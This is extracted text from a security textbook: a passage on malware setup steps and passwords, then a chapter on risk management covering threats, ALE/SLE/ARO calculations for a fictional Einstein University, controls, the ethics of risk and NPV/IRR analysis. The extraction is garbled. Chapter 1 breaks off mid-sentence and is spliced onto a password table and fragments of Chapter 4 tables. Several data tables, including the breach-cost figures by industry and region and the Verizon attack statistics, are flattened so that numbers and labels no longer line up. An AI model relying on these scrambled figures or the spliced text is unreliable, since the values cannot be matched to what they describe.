It is most important to set up a computer properly to combat malware. Procure antivirus software and ensure that security options  – including a firewall  – are turned on. Antivirus software matches signatures (or snippets) from viruses and worms against the files in a computer. A good antivirus software will observe software as it executes to determine, if a downloaded file has a virus or if the firewall is turned off. Some antivirus software also monitors transmissions and specific port numbers (or application IDs) you are sending and receiving from. An example of a port is web HTML, email SMTP, or secure file transfer protocol SFTP. This port use information is aggregated over thousands of computers. When a new pattern of usage emerges, such as computers suddenly using an unusual port number, then this emerging application is observed for malware activity. Antivirus software is an important investment in all computers – laptop, smart phone, tablet - because malware is likely wherever you read email, open webpages, and download applications. A second step in combatting malware is to ensure that the operating system, applications, and antivirus software are updated regularly. Modern day programs are large and complex, and often have bugs (or defects). Crackers and criminals often take advantage of these bugs, issuing attacks specifically against them. These bugs are periodically found and fixed by the manufacturer, by patching software. One such example of a software bug (and proof that all operating systems are targeted) was the Mac Fakeflash virus. This virus infected one half million Macs by downloading itself through a hole in Java software without any user action or notification. Apple promptly published a fix. Users who downloaded patches immediately were the safest against this (and other) threats. [8]. A third step in setting up a system against malware is to ensure the firewall is enabled and properly configured. Firewalls vary in capability, but a firewall for a personal computer generally ensures that a computer filters incoming transmissions by application type. For example, firewalls generally allow outgoing transmissions from a computer, and replies to that transmission using the same port. Your firewall should discard strange incoming requests on unused ports. A personal computer firewall (by itself) will not filter malware transmissions within allowed incoming packets. A fourth must-do is to use excellent passwords with two-factor authentication. Verizon’s 2022 Data Breach Investigation Report reveals that password and other credentials are the most commonly compromised data at 63% [2]. Once a login is possible, an attacker can do all sorts of harm, including organizational espionage, installing ransomware, or sending an email in your name (known as business email compromise.) Any cracker knows that your login name is probably your email name, and can use automated password-guessing software to guess passwords. A dictionary attack uses software that iterates through a password dictionary of common names and words to guess someone’s password on the system. A social engineer will try your favorite people, pets, teams, hobbies and more as potential passwords. If neither of these short-cut methods work, then the cracker may try a brute force attack. With this exploit, all possible combinations of passwords

1  Security Awareness: Brave New World

14

starting with: a, aa, ab, ac, and so on will be attempted until success is reached. If we assume the attacker has access to a botnet, then the job of guessing passwords is divided among many computers. If a password is 8 characters long and uses the alphabet, numbers, and punctuation in your password, it may take 2 hours or less to break into that account. Longer passwords are better. If a password is 12 alphabetical characters long, it can take up to 96 years, or as long as 500 years if you also include numbers in your password. Thus, it is important to use long passwords and avoid any common words or names in a password. Two factor authentication combines something you know (e.g., password) with something you are (e.g. your fingerprint) or something you have (e.g., a cell phone). To learn how to create a secure password, see Fig. 1.1 and Table 1.2. Finally, never divulge your password or write it down. These four steps – using current antivirus software, having a great password (and better yet, two-factor authentication), ensuring software updates occur, and using a firewall  – are important setup steps for all computers, including smart phones. However, your behavior on your computer is just as important. It takes time for antivirus, operating system, and software companies to recognize and defend against daily new exploits. Even with these precautions, you may download zero-­ day attacks, which are attacks for software bugs or worms that are not yet known and without defenses. Therefore, be careful to access or download only from

Merry Christmas Bad Password Merry Xmas (Synonym)

(Intertwine Letters)

(convert vowels to numeric)

(Lengthen) (Combine languages) MerryChrisToYou MerryJul (Abbreviate) MaryJul

*Mxemrarsy*

Good Password

MerChr2You

(Keypad shift Right.... Up) Glad-jes-Birth 6 million transactions

1–6 million transactions 20,000–1 million e-commerce trans Possible FERPA Violation =>Forensic Help Availability=> Loss of Registrations Affects: Confidentiality, Integrity. Integrity => Student Lawsuit Confidentiality => FERPA violation Both => Forensic help

Table 4.2  Consequential financial loss calculations (workbook exercise) Consequential Financial Loss Lost business for one day (1D) Breach Cost

Lawsuit FERPA regulation

Total Loss

Calculations or Notes

1D=$16,000 Registration = $0-500,000 per day in income (avg. $16,000) $644,000 IBM Breach Cost Estimate using per record cost= $161* x 4000 Students =$644,000 OR maximum estimate for education industry: IBM Breach Cost: $3.79 million* Comprehensive number includes forensic help (* from [IBM21]) $1 Million Student lawsuit may result as a liability. $1 Million Violation of FERPA regulation can lead to loss of government aid, assumes negligence.

reader of this book is or has been a student; do you agree you are (or were) only worth this measly amount? A later section in this chapter will address the ethics of risk, including this issue. Until then, further analysis of this case will focus only on the information security aspect, which is the topic of this book. Table 4.1’s Consequential Financial Loss (column 3) is the most complex column to complete. Table  4.2 helps in its understanding, by providing notes and

72

4  Managing Risk

special calculations for any complex consequential financial losses. Both tables are provided in the Security Workbook for you to calculate. IBM Security’s Cost of a Data Breach Report provides an inclusive number for an estimate of a data breach, that considers forensic costs, lost business, etc. One problem in using the report, is that breach costs can be calculated using a per breached record value, or by using the average total breach cost, which here varies between $644,000 and $3.79 million. I continue with the $644,000 number, but management should be aware that the cost could total $3.79 million or more. Annual security studies provide statistics estimating average security incident costs. Table  4.3 shows an average cost for organizations, as provided by IBM Security’s Cost of a Data Breach Report (in conjunction with Ponemon Institute) in 2021–2022 [2, 3]. These numbers range from year to year, but the top 4 initial attack vectors are common for 2021 and 2022. A single-calculation estimate of an organization’s security liability is the product of the average cost per breached record times the number of records of protected individual information (PII) the organization processes. Breached record costs recently have ranged between average low (2020) = $146 and high (2022) = $164 [3]. (Our Einstein case study uses 2021 statistics of $161/breached record.) Table 4.4 shows the average cost of a data breach for a number of industries, as provided by IBM Security’s Cost of a Data Breach Report for 2021. Table 4.5 shows the average cost of a data breach by nation, where ASEAN represents the Association of South-East Asian Nations. While not provided in these Verizon and IBM reports, the average breach frequency quoted by past reports is approximately 12% annually [4]. Risk Analysis consists of the next three steps, which include analyzing threats and vulnerabilities; estimating likelihood of exploitation; and computing effective losses. Table 4.3  Average cost of a data breach: IBM security’s cost of a data breach report 2021, 2022 [2, 3] Category Most common initial attack vector Data breach cost – total Stolen or compromised credentials [3] (19%) Phishing (16%) Cloud misconfiguration (15%) Third party software vulnerability (13%) Average Breach Cost Mega breach cost [2] 1 million-10 million records breached 50 million-65 million records breached

Avg. cost per breach type (in millions) $4.50 $4.91 $4.14 $4.55 $4.35 $52 $401

4.1  Risk Management Overview Table 4.4  Breach cost by industry: IBM security 2019;s cost of a data breach report 2021 [2]

73 Industry Communications Consumer Education Energy Financial Health care Hospitality Industry Media Pharmaceutical Public sector Research Retail Services Technology Transportation

Cost of breach (in millions) $3.62 $3.7 $3.79 $4.65 $5.72 $9.23 $3.03 $4.24 $3.17 $5.04 $1.93 $3.6 $3.27 $4.65 $4.88 $3.75

Table 4.5  Regional risks

Region North America Europe-­ Africa

Asia Pacific

Latin & South America

Top attack types (Verizon 2022) [5] System intrusion Social engineering Web app attacks Social engineering System intrusion Web app attacks

Motive (Verizon 2022) [5] Financial: 96% Espionage: 3% Grudge: 1% Financial: 79% Espionage: 21%

Nation United States Canada

Middle East Western European Union nations United Kingdom Scandinavia Social engineering Financial: 54% Japan Web app attacks Espionage: 46% ASEAN-­ System intrusion Australia India System intrusion Financial: 92% Latin America Denial of service Convenience: 3% Brazil Social engineering Espionage: 2% Grudge: 2%

Sources: IBM security’s cost of a data breach report 2022 [3] Verizon data breach investigations report 2022 [5]

Average cost of breach (in millions) (IBM 2022) [3] $9.44 $5.64 $7.46 $3.74–$4.85

$5.75 $2.08 $4.57 $2.87–$2.92 $2.32 $2.80 $1.38

74

4  Managing Risk

4.1.2 Step 2: Determine Loss Due to Threats In this step we consider all the probable threats that are likely to occur. These issues will vary, based upon your industry, geographic location, culture and company. Figure 4.3 helps to explain security vocabulary. A diamond cutter will have diamonds, which are her assets. A threat to this industry is theft, but a ‘threat’ is only a concept; the word ‘threat’ does not imply that the problematic event has actually occurred. An example of a vulnerability might be an unguarded, open door, which provides the opportunity for the threat to occur. A threat agent in this example is the thief. Risk is the potential danger to assets. Consider a wide variety of possible threats, threat agents and vulnerabilities. Problems can arise due to any of the following threats [6, 7]: Physical Threats • Natural: Flood, fire, cyclones, hail/snow, plagues and earthquakes • Unintentional: Fire, water, building damage/collapse, loss of utility services and equipment failure • Intentional: Fire, water, theft and vandalism Non-physical Threats • Ethical/Criminal: Fraud, espionage, hacking, identity theft, malicious code, social engineering, vandalism, phishing and denial of service

Fig. 4.3  Threats, vulnerabilities, and threat agents

4.1  Risk Management Overview

75

• External Environmental: industry competition, or changes in market, political, regulatory or technology environment • Internal: management error, IT complexity, poor risk evaluation, organization immaturity, accidental data loss, mistakes, software defects and personnel incompetence. For the ethical/criminal category (which is the focus of this chapter) possible threat agents include people who perform intentional threats, such as: crackers, criminals, industry spies, insiders (e.g., fraudsters), and terrorists/hacktivists. Vulnerabilities are the ‘open doors’ that enable threats to occur. Categories of vulnerabilities include: • Behavioral: Disgruntled employee, poor security design, improperly configured equipment; • Misinterpretation: Employee error or incompetence, poor procedural documentation, poor compliance adherence, insufficient staff; • Poor coding: Incomplete requirements, software defects, inadequate security design; • Physical vulnerabilities: theft, negligence, extreme weather, no redundancy, violent attack.

4.1.3 Step 3: Estimate Likelihood of Exploitation For each important threat, consider the likelihood (or probability) that the event will occur. Selecting good statistics is a challenge and may come from past experience (yours or others), your best analysis, or (worst case) your best guess. Your experience is a personalized statistic that can be calculated from your metrics and reports. Other’s experience may include professional risk assessors (often associated with the insurance industry) and national or international standards or reports, such as that shown in Tables 4.4 and 4.5. You may be able to derive reasonable statistics from economic, engineering, or market analysis models, or from experiments. A last resort (but certainly better than no statistic) is your best guess. It is also important to consider trends: is a threat increasing or decreasing in likelihood? Table 4.6 lists recent security concerns per industry, provided by the Verizon’s Data Breach Investigation Report [5]. These statistics were accumulated from law enforcement, forensic groups, cyber emergency response teams, and service providers worldwide. These statistics evaluate the total set of analyzed data breach attacks, and proportion them out by industry. Statistics include the source of the attacks: external versus internal (employees), motive of attack, and types of breached records. The combination of top attack types generally total 80–90% of attacks; one is System intrusion, which includes advanced persistent threat and ransomware. These statistics can help determine the priority and types of problems that your industry is prone to. These statistics cannot be directly used in risk analysis, since they do not indicate the rate of attack.

76

4  Managing Risk

Table 4.6  Security attacks by industry: Verizon data breach investigations report 2022 [5]

Accommodation, food services

Education

Entertainment, recreation

Finance, insurance

Healthcare

Information

Manufacturing

Mining, utilities

Professional services

Public admin

Attack source External: 90% Internal: 10% External: 75% Internal: 25% External: 74% Internal: 26% External: 73% Internal: 27% External: 61% Internal: 39%

Motive Financial: 91% Espionage: 9%

Financial: 95% Espionage: 5%

Financial: 97% Grudge: 3%

Financial: 95% Espionage: 5%

Financial: 95% Espionage: 4% Convenience: 1% Grudge: 1% Financial: 78% Espionage: 20% Ideology: 1% Grudge: 1% Financial: 88% Espionage: 11% Grudge: 1% Secondary: 1%

Top attack types System intrusion Social engineering Web app attacks System intrusion Web app attacks Errors Web app attacks System intrusion Errors Web app attacks System intrusion Errors Web app attacks Errors System intrusion

System External: intrusion 76% Web app attack Internal: Errors 24% System External: intrusion 88% Web app attack Internal: Social 12% engineering Partner: 1% Financial: 78% Social External: Espionage: 22% engineering 96% System Internal: 4% intrusion Web app attacks Financial: 90% System External: Espionage: 10% intrusion 84% Web app attacks Internal: Social 17% engineering Multiple: 1% Financial: 80% System External: Espionage: 18% intrusion 78% Errors Ideology: 1% Internal: Web app attacks Grudge: 1% 22%

Compromised data Credentials: 45% Personal: 45% Payment: 41% Other: 18% Personal: 63% Credentials: 41% Other: 23% Internal: 10% Personal: 66% Credentials: 49% Other: 23% Medical: 15% Personal:71% Credentials: 40% Other 27% Bank: 22% Personal: 58% Medical: 46% Credentials: 29% Other: 29% Personal: 66% Other: 35% Credentials: 27% Internal: 17% Personal: 58% Credentials: 40% Other: 36% Internal: 14% Credentials: 73% Personal:22% Internal: 9%

Credentials: 56% Personal: 48% Other: 26% Internal: 14%

Personal: 46% Credentials: 34% Other: 28% Internal: 28% (continued)

77

4.1  Risk Management Overview Table 4.6 (continued)

Retail

Very small business

Attack source External: 87% Internal: 13% External: 69% Internal: 34% Multiple: 3%

Motive Financial: 98% Espionage: 2%

Financial: 100%

Top attack types System intrusion Social engineering Web app attacks System intrusion Social engineering Privilege misuse

Compromised data Credentials: 45% Personal: 27% Other: 25% Payment: 24% Credentials: 93% Internal: 4% Bank: 2% Personal: 2%

Table 4.6 shows that for most organizations, organized crime is the biggest threat [5]. Protected assets include payment cards, financial credentials and bank account information. If an organization is primarily classified as information, mining, public, utilities or administration services, spying is also a considerable threat. Active state affiliates include China, North Korea, and eastern Europe. Desired assets include password credentials, trade secrets, technical resources (e.g., source code) and classified information [5]. They target mail servers, file servers, directory servers and laptops/ desktops. Their favorite attacks include spear phishing, stealing data (passwords, information) and remote control of computers (backdoors, botnet and rootkit).

4.1.4 Step 4: Compute Expected Loss After listing important assets and likely threats, we have a good estimate of the probability these threats will occur. Next, we can calculate our estimated annual loss due to risks. There are three common methods to do this: Qualitative, Quantitative and Semi-Quantitative Analysis techniques. If you have never done risk analysis before, the Qualitative Analysis technique is the easiest, fastest and recommended place to start. It is also helpful when you do not know precise threat probabilities or asset costs, such as intangible costs: e.g., what is the cost of loss of reputation following a public announcement of data intrusion? Qualitative Analysis works with intuition and judgment rather than actual cost values. The end result is a list of priority risks to address. Qualitative Analysis uses the Vulnerability Assessment Quadrant Map, shown in Fig. 4.4. The horizontal arrow indicates the impact of the threat on your business, with the far right being ‘Threaten Business’ and far left being ‘Slow Down Business’ (see top labels). The middle vertical arrow represents the probability of the event occurring, with the top being ‘1 week’ (or less) and the bottom being ’50 years’ (see left side labels). This results in four quadrants, with Quadrant 1 in red. When threats

78

4  Managing Risk Slow Down Business

1 (52) 1 year

Temp. Shut Down Business

Snow Emergency Stolen Laptop

Threaten Business

Hacker/Criminal Threat (Likelihood) Malware Loss of Electricity

Social Engineering

Failed Disk

Intruder 5 years

Stolen Backup

10 years

Impact (Severity)

(.1)

20 years

Tornado/Wind Storm

(.05)

Earthquak 50 years (.02)

Flood Pandemic

Fire

Fig. 4.4  Qualitative risk assessment (workbook exercise)

lie in Quadrant 1, they have both a high likelihood and a high impact and thus are most serious. The yellow quadrants – Quadrants 2 and 3 – either have a high likelihood or high impact, but not both. The threats lying in these quadrants are lower priority than Quadrant 1 threats, but may still be important. Quadrant 4, in green, includes threats that have low probability and low impact, and thus can usually be ignored. The vertical time interval and horizontal business impact labels are not usually shown in Qualitative Analysis, but are provided to help understand magnitude. Threats are shown in white boxes in Fig. 4.4. The position of the threats should vary by geographic location, industry type, etc. In the Security Workbook, you can alter this diagram by moving threats around to their appropriate quadrants and locations within quadrants, appropriate for your organization. While Qualitative Analysis is relatively easy, it does not provide an estimated cost of risk expense, nor financial advice on how much to spend on security controls. Quantitative Risk Assessment helps with both goals. The first step is to estimate the Single Loss Expectancy (SLE), which is the cost to the organization if a threat occurs once [1]. This expense includes the direct replacement cost plus potentially additional expenses, such as installation. The Annual Rate of Occurrence (ARO) is the probability or likelihood that that a SLE might occur during one year. The Annual Lost Expectancy (ALE) is the expected loss per year due to the threat, and is calculated as:

ALE = SLE x ARO (4.2)

4.1  Risk Management Overview

79

Table 4.7  Partial quantitative risk analysis for Einstein University (workbook exercise) Asset

Threat

Single Loss Expectancy (SLE)

Registration Server

System or Disk Failure

Registration Server

Hacker penetration

Grades Server

Hacker penetration

System failure: $10,000 Registration x 2 days: $32,000 Breach Estimate: $644,000 Max: $3.7 million Registration x 2days: $32,000 Breach Estimate: $644,000

Faculty Laptop

Stolen

$1,000 ______________ FERPA = $1 million Loss of Reputation

Annualized Rate of Occurrence (ARO) 0.2 (5 years)

Annual Loss Expectancy (ALE) $8,400

0.20 (5 years)

$676,000x.2 =$135,200 Max: $3.7M x.2 =$740,000

0.05 (20 years)

$644,000x0.05 =$32,200

2 (5 years * 10 instructors) 0.01

$2,000 $10,000

Table 4.7 demonstrates a partial Quantitative Risk Analysis for Einstein University. Row four demonstrates loss of faculty laptops, which have a higher loss rate than the commonly used faculty PCs. If the loss of a laptop costs $1000, including replacement and installation expense, and the laptops are lost on average every five years, then the tangible costs of SLE = $1000, the ARO = 0.2, and the ALE = $1000*0.2 = $200 per year. If we have 10 instructors with laptops, then an accurate direct loss estimate for ARO = 10*.2 = 2, and the ALE would be calculated as ALE = $1000*2 = $2000 per year. Such losses could also expose grades and Social Security Numbers, leading to a probability of a FERPA investigation and bad press. This could result in additional consequential financial losses, estimated as an SLE = $1 million. This is calculated separately with an estimated ARO = 0.01 or 1 in 100 years, leading to an ALE of $10,000. For some threats, even a maximum reduction in value will not result in a total loss. For example, a fire may reduce the value of a building from $1 million to $200,000, which is the value of the land itself. In this case, the exposure factor is 80%. The appropriate SLE calculation would be:

SLE = Asset Value ( AV ) x Exposure Factor ( EF )

(4.3)

Challenges with a Quantitative Analysis include [8]: 1. Unknown statistics. Determining an appropriate likelihood and (in some cases) impact is difficult. Since crackers do not announce themselves, many organizations do not know if or how many attackers have already broken into their networks. Smaller organizations often lack sufficient security expertise or staff to

80

4  Managing Risk

SE

Catastrophic (5)

VE

H G HI

Major (3)

M

M IU ED

Impact

RE

Material (4)

W LO

Minor (2)

Insignificant (1) Rare(1)

Unlikely(2) Moderate(3)

Likely(4)

Frequent(5)

Likelihood

Fig. 4.5  Semi-quantitative risk analysis

recognize attackers, or estimate the likelihood of an attack. For accurate statistics, companies often hire risk consultants. Experts can rate the effectiveness of specific security devices, such as specific firewalls, in countering attacks. 2. Complex Costs. Risk impacts may be counted two or three times if done improperly. For example, if a hacker breaks into both the registration and grades databases, we are liable only once for FERPA. 3 . Security hides risk. When implemented well, users get the impression that security is not an issue. How can you estimate the benefits of security, when you are not paying the risks’ costs because sufficient security is in place? A Semi-Quantitative Risk Analysis method is a half-way measure between Qualitative Analysis and Quantitative Analysis [9]. While it cannot estimate risks costs, it can rank risks, enabling the prioritization of risks. This technique estimate threats with (for example) five levels of impact and five levels of likelihood, as shown in Fig. 4.5. Each level may be given a meaning [1]. The Impact rating could be defined as follows: Insignificant: No meaningful impact; Minor: Impacts a small part of the business; Major: Impacts company brand; Material: Requires external reporting; and Catastrophic: Failure or downsizing of company. Each impact rating should also have an associated cost range, e.g.: Rare: Very unlikely to occur; Unlikely: Not encountered within last 5 years; Moderate: Occurred in last 5 years; Likely: Occurred in last year; Frequent: Occurs multiple times per year. Risks that fall into the red color are most critical, while those falling in the green color are least serious. A risk priority is calculated by multiplying the Impact and Likelihood ratings, and sorting results for high numbers.

RiskPriority = Impact * Likelihood (4.4)

4.1  Risk Management Overview

81

4.1.5 Step 5: Treat Risk All risk analysis techniques used in Step 4 provide at least a prioritization of risks, which helps in determining the threats to be addressed. Quantitative Risk Analysis, in addition, provides a financial value that indicates how much to spend on controls. Each risk should be addressed using one of the following risk treatment types: Risk Acceptance: It is possible to ignore risk, if the risk exposure is negligible. We will handle any arising problem as necessary. E.g.: Snowstorm in Florida. Risk Avoidance: Stop doing risky behavior altogether, such as eliminating the use of Social Security Numbers, and avoiding storage of payment card numbers. Risk Mitigation: Implement control(s) that minimize vulnerability. Two approaches include minimizing likelihood and minimizing impact [1]. Teaching security awareness and using a firewall and antivirus software would minimize ­likelihood, while developing an Incident Response Plan would minimize the impact of an attack. Risk Transference: Pay someone to assume risk for you, such as purchasing insurance against the threat. This category is recommended for low frequency, high cost risks. While insurance can transfer the financial impact, it cannot transfer legal responsibility (which you retain). Controls help to mitigate risk. There are many types of controls, and combining or layering controls is most effective. Controls can be preventive, detective or corrective, as mentioned in Chap. 2, although preventive controls are preferable. Additional types of controls include deterrent, compensating, and countermeasure controls [10]. Deterrent controls discourage people from deviant behavior. An example would be a policy of firing and/or prosecuting people for security violations or crimes. A compensating control is used as a weaker alternative when the recommended control is infeasible. An example might be the logging of critical employee transactions when segregation of duties is not possible. Finally, countermeasures are targeted controls, which address specific threats. An example is to use a router in combination with a firewall, to counter high-volume IP packet attacks; the ‘border’ router (i.e., router at the border to the internet) can discard the obvious attack packets, while the firewall carefully screens the remaining packets. After a full implementation of controls, some residual risk remains. Figure 4.6 demonstrates that this residual risk should be a fraction of the original risk. A partial solution for Einstein University is shown in Table 4.8. In this table, the risk and ALE is copied from the previous step in Table 4.7. Controls are considered and priced. If you are new to security, selecting and pricing controls may be difficult. For now consider that specific controls can include technology controls (e.g., firewalls, antivirus software, access control), administrative controls (e.g., security policies, procedures, training), and physical controls (e.g., locks, guards, keycards). Completing this task will be easier after learning about and working with security controls in the other chapters. Security is a system: if you are doing it right, you will be tweaking your work across chapters as you learn more about your business and security.

4  Managing Risk

82

Fig. 4.6  Residual risk after treatment Table 4.8  Analysis of risks versus controls (workbook exercise) Risk Stolen Faculty Laptop

ALE Score

Control

$2K Encryption $10,000 (FERPA)

Registration System or $8,400 Disk Failure Registration Hacker $135,200 Penetration (max $740,000)

Cost of Control $60/device

RAID $750 (Redundant disks) Unified Threat Mgmt $1K Firewall Log monitoring Network monitoring

Forensic statistics show that 78% of all intrusions may be rated as ‘low difficulty’ [16]. In other words, the organizations were an easy attack. Doing a good job of implementing security, including acting on risk management plans and other chapters in this book, should make an organization safer, at least from the easy attacks.

4.1.6 Step 6: Monitor (and Communicate) Risk As your business, the industry, and the world changes, your organization’s risk profile will also change [10]. You will learn more about the costs and likelihoods of risk as you experience threats. Automated controls may provide better insight, by

4.2  The Ethics of Risk

83

Table 4.9  Sample risk scoreboard Issue

Status

Estimated Cost of Threat

Incident Response

Procedure being defined – incident response

$5,000

Stolen Laptop

In investigation

$2000, legal issues

Cost overruns

Internal audit investigation

$10,000

Security Awareness

Training completed

$500

tracking security threats. Management should monitor their organization’s risk profile regularly, including the status of control implementations and compliance audits. Since people tend to avoid discussing risk, the topic must be regularly brought up with appropriate levels of management [7]. Table 4.9 demonstrates a report that informs management of ongoing issues. It is a color-coded risk scoreboard or dashboard, which uses the stoplight colors: red for serious threats, yellow for lower-priority threats, and green for threat resolution. For each issue the report includes a color indicating the overall status, a brief description, and approximate cost. The report is summarized, since senior managers do not need all the technical details. In this table, a flaw in physical security was fixed by training the personnel involved. That issue has been resolved and will not appear in the next report. Some cost overruns are being investigated – these issues are underway. Finally a laptop has been stolen and a new procedure for FERPA incidents is needed. Those are new issues for which remediation is about to begin. The Risk Assessment process has two main benefits. One benefit is to control costs when disaster strikes – as it inevitably does. Another benefit is in regulatory compliance. In the United States, judges in civil and criminal courts expect organizations to protect themselves and their clients using risk assessment. Due Diligence is the responsibility of doing careful risk assessment. Due Care is the follow-up responsibility of implementing recommended controls from the risk assessment process. Liability is minimized if reasonable precautions have been taken [10].

4.2 The Ethics of Risk The original purpose of risk management was to ensure that an organization did not jeopardize its existence or security by making very poor decisions. This perspective is a subjective one, to protect the organization itself. In the example of a school shooting (Table 4.1), a student’s life is not valued sufficiently highly, since from the school’s perspective its loss of income is only from tuition. According to traditional risk assessment techniques in deriving the maximum cost of controls, the school could consider student life equivalent to the cost of loss of tuition (assuming law

84

4  Managing Risk

suits are not likely to occur, unless there is obvious negligence.) While this example is not specifically about information security, it could apply to such cases when someone’s identity, health, or privacy is affected. Three cases involving technology where risk analysis affected human life demonstrated poor decisions due to economic or political reasons [10]. First, the night before the doomed Challenger space shuttle launch, one executive told another: “Take off your engineering hat and put on your management hat.” Second, the value of human life is sometimes related to projected income, which unfairly penalizes people in developing nations. In Bhopal, India, where a chemical leak killed nearly 3000 people, the value of life was estimated so low that its settlement was less than half the Exxon Valdez oil spill’s settlement. Third, from a risk perspective, the Three Mile Island nuclear disaster was a ‘success’ in that no lives were lost; however public acceptance of nuclear technologies eroded due to the ensuing environmental problems and the then-proven threat nuclear energy posed. These three cases show that it is easy to underestimate the cost of others’ lives, when your life is not impacted. Ethical considerations include that human rights are natural or ‘God-given’ rights, which apply equally to all. W. D. Ross proposed that we have a duty to not harm others physically or psychologically, which means we should avoid harming someone’s health, security, intelligence, character or happiness [11]. This view of risk believes that an organization should try to do good to others. While it is not possible to eliminate all risk, considering your customers’ or clients’ perspectives is a worthy goal. This can occur by including the public in evaluating risk, related to these decisions [11]. In the case of the school shooting, it is first recognized that the school is not responsible for taking the life of the student(s), since the shooter did. However, an ethical school board would attempt to protect students and staff during risk assessment by taking the societal perspective and considering the possibility of losing a number of human lives. Studies on the ‘Value of Life’ consider that people demand more pay for risky jobs and extrapolate to estimate that a life is worth between $2 and 8 million in 1984 dollars [12]. Using these values as asset losses in Quantitative Analysis is certainly more reasonable than the value of tuition.  Ethical risk is described in more detail in Chap. 20.

4.3 Advanced: Financial Analysis with Business Risk Three financial analytic techniques may help during quantitative risk analysis. The three techniques include cost-benefit analysis, net present value and internal rate of return. These terms are commonly used by business management and can be used to convince management to expend money for controls from a financial perspective. Cost-Benefit Analysis  Implementing security controls has a financial cost, but hopefully would result in a reduction in financial loss. This reduction in expendi-

4.3 Advanced: Financial Analysis with Business Risk

85

tures can be described as potential benefits. To simplify a cost-benefit analysis, consider that in Year 0 we purchase the control (−C). In subsequent years, we incur reduced expenses (+Y1 + Y2). These are calculated considering our costs previous to implementing the control, compared to our estimated costs after the control [13]. Thus, a simplified cost-benefit analysis (SCBA) indicates the total cost of a security control over its lifetime, and is calculated as: SCBA = – C0 + Y1 + Y2 + Y3 +… (4.5)



If the SCBA results in a positive answer, the organization saves money by spending money for the control. A zero or negative answer results in a break-even or loss, respectively. However, this answer is simplified, since financial analysis assumes that money today is worth more than the same monetary value in the future. Therefore, we need to discount future earnings, in order to determine a financial estimate in today’s money (called present value). The Net Present Value (NPV) is then calculated by summing each Return for year t, Rt, discounted using an interest rate, i, often estimated at 10% [14]. This is shown in Eq. 4.6, where the original cost is specified as a negative R0 and subsequent reductions in expenses are positive. t =0

NPV = ∑

N

Rt

(1 + i )

t

= R0 +

R1

(1 + i )

1

+

R2

(1 + i )

2

+

R3

(1 + i )

3

+… (4.6)

The NPV determines the value to us today of implementing a security control. What if we have a number of potential investments, and we want to determine which is the best investment? An Internal Rate of Return (IRR) provides a rate of how much each investment will pay off. The higher the rate, the higher is the payoff. Equation 4.6 is also used to calculate the IRR. However, instead of knowing i and calculating NPV, we set NPV to zero and solve for the rate, i. An example might be that encryption software costs $35 per license and we have 100 laptops with confidential data. Our estimated savings in risk for 5 years for this investment is $1000 per year. Table  4.10 shows the annual calculations, using a discounted interest of 10%. The NPV sums to $290.78, and the IRR = 13.2%. The IRR was estimated using the NPV() formula in Excel. Table 4.10  Calculations of NPV

Year 0 1 2 3 4 5 Total

$ Value −3500 1000 1000 1000 1000 1000 1500

Present value −3500 909.09 826.45 751.31 683.01 620.92 290.78

86

4  Managing Risk

4.4 Advanced: Risk for Larger Organizations Larger organizations may have a more formalized risk process and security personnel should be aware of them. The NIST risk assessment methodology includes more stages and specified, documented inputs and outputs, as shown in Fig. 4.7. Previous history can help considerably with generating an accurate likelihood. This can be achieved by using a well-selected set of metrics or statistics. Quantifiable metrics should be collected periodically and inexpensively, preferably in an automated way. An example metric might be: how many viruses are the help desk reporting per month? A baseline is a measurement of performance at a particular point in time. Using consistently measured data, it is possible to observe changes in the metrics over time, discover trends for future risk analysis, and measure the effectiveness of controls. Risk management should occur at the strategic, project and operational levels [10]. At each level, risk assessment should be consistent with higher levels and related risk assessments. Each level should also consider the details associated with the scope or project at hand, such as a specific software development project [15]. Regardless of level, the scope of the risk project is carefully selected to cohesively focus on, and properly cover, a defined area or product. A Risk Assessment Report is the final output. This report ensures that security controls were tested and pass inspection. The product or area is then certified for use. Input

Activity

Output

Hardware, software

System Characterization

Company history Intelligence agency data: NIPC, OIG

Identify Threats

Audit & test results

Identify Vulnerabilities

Current and Planned Controls

Analyze Controls

List of current & planned controls

Determine Likelihood

Likelihood Rating

Analyze Impact

Impact Rating

Threat motivation/ capacity Business Impact Analysis Data Criticality & Sensitivity analysis Likelihood of threat exploitation Magnitude of impact Plan for risk

Determine Risk Recommend Controls Document Results

Fig. 4.7  NIST risk assessment methodology

System boundary System functions System/data criticality System/data sensitivity List of threats & vulnerabilities

Documented Risks Recommended Controls Risk Assessment Report

87

4.5  Questions and Problems

Risk assessment requires business and security people to work together closely. Governance and senior management are responsible for making decisions concerning risk, allocating resources for controls, and evaluating risk assessment results. An Information Security Manager is responsible for coordinating the risk process and developing the risk management plan. The business side is responsible for prioritizing assets and helping to define and implement controls for business processes. Business roles include: Process Owners, who make decisions concerning securing the business process, and Information Owners, who ensure controls are in place to address CIA, including signing off on permissions for access to business data. On the security side, security practitioners design security requirements and implement controls into IT systems, networks, and applications, while Security Trainers develop training materials for security, and educate employees as to security practices. The Chief Information Officer (CIO), as the head IT person, manages IT plans and budgets and works closely with the Information Security Manager. These two roles are preferably separate, since CIOs tend to focus on managing IT processes, whereas the security manager focuses on security – a full-time job at any sizeable institution.

4.5 Questions and Problems 1. Vocabulary. Match each meaning with the correct word. Vulnerability Residual risk Threat Qualitative risk analysis

Risk mitigation Risk assessment Risk management

Risk avoidance Risk transfer Threat agent

Annual loss expectancy Single loss expectancy Annual rate of occurrence Quantitative risk analysis

(a) A method of eliminating risk by stopping risky behavior. (b) A method of addressing risk by adding controls to minimize risk exposure. (c) The financial loss accruing from one risk incident occurring. (d) The remaining level of risk, after risk controls are implemented. (e) A risk term addressing the enabling of a risk. Example s include: disgruntled employee, insufficient staff, poor documentation. (f) A risk term addressing a potential risk problem. Examples include: severe weather, vandalism, fraud, malware, phishing. (g) A method of determining risk priority, by using gut feel. (h) A term denoting the full risk process, including risk planning, determination, treatment and monitoring. 2. Risk Lifecycle. Your large organization averages 20-some malware infection reports a month. What might be done in each stage of the Continuous Risk Management Process (shown in Fig. 4.2) to reduce malware infections?

4  Managing Risk

88

